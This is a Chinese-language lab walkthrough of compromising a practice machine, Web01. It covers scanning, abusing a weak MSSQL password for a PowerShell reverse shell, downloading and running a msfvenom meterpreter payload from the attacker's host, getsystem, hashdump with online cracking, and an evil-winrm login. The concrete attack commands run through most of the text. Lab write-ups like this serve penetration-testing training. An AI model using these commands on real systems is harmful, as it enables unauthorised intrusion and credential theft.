前言
该靶机是目标局域网内的入口机器,本文目的是拿到 Web01 的最高权限并且实现远程登录
信息收集
$ arp-scan -l
发现存在一台 IP 值为:192.168.237.139 的主机
$ namp 192.168.237.139
简单扫描发现开放端口:21、80、1433,其中存在 mssql 服务
使用 Fscan 进行扫描:Releases · shadow1ng/fscan (github.com)
$ ./fscan -h 192.168.237.139
发现 ftp 服务存在匿名访问,不过没有任何泄露
mssql 服务存在弱口令
反弹 SHELL
下载 mssql 命令执行工具:Release mssql-command-tools · Mayter/mssql-command-tool
并且生成 powershell 的反弹命令:HYH 的反弹 Shell 生成器
nc 监听端口
并且执行命令
成功得到 powershell 的反弹
权限提升
当前用户权限为普通用户
生成 msf 反弹木马
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.237.140 LPORT=6666 -f exe -o reverse.exe
并且开放 http 服务,让目标机器下载
#kali $ python -m http.server 80 #PS PS: curl 192.168.237.140/reverse.exe -O shell.exe
再开一个终端,打开 msfconsole
$ msfconsole
设置监听器 handler,并配置
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.237.140 msf6 exploit(multi/handler) > set lport 6666 msf6 exploit(multi/handler) > run
回到 powershell 那里运行 exe 文件
可以看到成功进入 meterpreter
执行 getsystem 进行权限提升,如下图可以看到提升到了 system 最高权限
meterpreter > getsystem
进入 administrator 的目录下,拿到 flag
获取密码
$meterpreter > hashdump
获取到用户密码 hash 值,这里只要 Administrator 的光标部分,是由 md5 进行加密的
将其放入解密网站:MD5 免费在线解密破解_MD5 在线加密 - SOMD5
成功得到密码
远程登录
由于在真实的渗透测试环境下是无法直接接触到目标机器的,所以要找到远程登录的办法
进行 nmap 全端口扫描
$ nmap 192.168.237.139 -p-
发现存在 5985 端口,该端口用于 Windows 的远程管理
evil-winrm 是一个可用于黑客攻击 / 渗透测试的 Windows 远程管理 (WinRM) Shell
由于知道了管理员的密码可以直接登录
$ evil-winrm -i 192.168.237.139 -u Administrator -p 'xxxx'
登录成功
